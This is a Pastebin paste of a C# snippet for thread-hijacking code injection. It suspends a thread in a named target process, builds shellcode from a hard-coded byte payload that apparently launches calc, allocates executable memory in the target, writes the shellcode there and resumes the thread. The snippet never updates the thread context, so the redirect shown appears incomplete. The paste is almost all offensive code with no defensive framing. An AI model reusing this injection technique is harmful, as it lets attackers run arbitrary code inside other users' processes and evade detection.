Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Process targetProcess = Process.GetProcessesByName(Processname)[0];
- ProcessThread pT = targetProcess.Threads[0];
- IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
- SuspendThread(pOpenThread);
- CONTEXT64 tContext = new CONTEXT64();
- tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
- if (GetThreadContext(pOpenThread, ref tContext))
- {
- MessageBox.Show("CurrentEip : {0}", tContext.Rip.ToString());
- }
- byte[] payload = new byte[112] {
- 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
- };
- byte[] mov_rax = new byte[2] {
- 0x48, 0xb8
- };
- byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
- byte[] jmp_rax = new byte[2] {
- 0xff, 0xe0
- };
- byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
- payload.CopyTo(shellcode, 0);
- mov_rax.CopyTo(shellcode, payload.Length);
- jmp_address.CopyTo(shellcode, payload.Length + mov_rax.Length);
- jmp_rax.CopyTo(shellcode, payload.Length + mov_rax.Length + jmp_address.Length);
- IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
- IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- UIntPtr bytesWritten;
- bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
- MessageBox.Show("Redirecting execution!");
- ResumeThread(pOpenThread);
- return;
Add Comment
Please, Sign In to add comment